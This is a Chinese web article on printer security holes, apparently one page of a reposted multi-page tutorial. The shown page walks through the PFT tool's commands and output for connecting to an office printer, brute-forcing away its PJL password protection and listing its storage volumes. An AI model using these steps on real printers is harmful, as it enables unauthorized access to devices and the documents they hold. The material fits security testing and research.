不可忽视的打印机漏洞研究

发布时间：2019-06-19 18:30:03 所属栏目：建站来源：VoltCary

导读：副标题#e# 一、前言经过最近一段时间测试，发现企业内网打印机存在多种漏洞，同时也经常被大家所忽略，因此才有本文的研究。当一台打印机连接网络，可以进行端口扫描、读写上传恶意文件、反弹shell，相当于一台服务器。常见攻击，信息泄露，如访问内存，

根据文章前面部分，也大概知道了打印机攻击是基于打印机语言命令，如输入PJL命令造成相关，需要掌握PJL命令，输入PJL命令比较麻烦，这里有一个强大的打印机框架工具PFT，而使用PFT工具可以无需掌握PJL命令，每一个参数已内置打印机语言，只需要调用对应参数来利用，配合help查看。

使用教程：

(1) PFT连接到打印机

pft> server 192.168.15.200 
Server set to 192.168.15.200 
pft> port 9100 
Port set to 9100 
pft> connect 
Connected to 192.168.15.200:9100 
Device: hp LaserJet 4250

(2) PFT清除PJL程序保护

清除成功之后，也能登录web控制台页面。

pft> env bruteforce 
try 30 
INFO: force_recv_clear() timed out for 270bytes (10 sec) 
Password disabled successfully

(3) 查看硬盘文件

一般高级的打印机会有硬盘，如下命令查看有哪些盘符。

pft> volumes 
Volume       Size       Free        Location      Label     Status 
0:   12619776   11786240             RAM          ? READ-WRITE

（编辑：衢州站长网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!

11/14

首页

尾页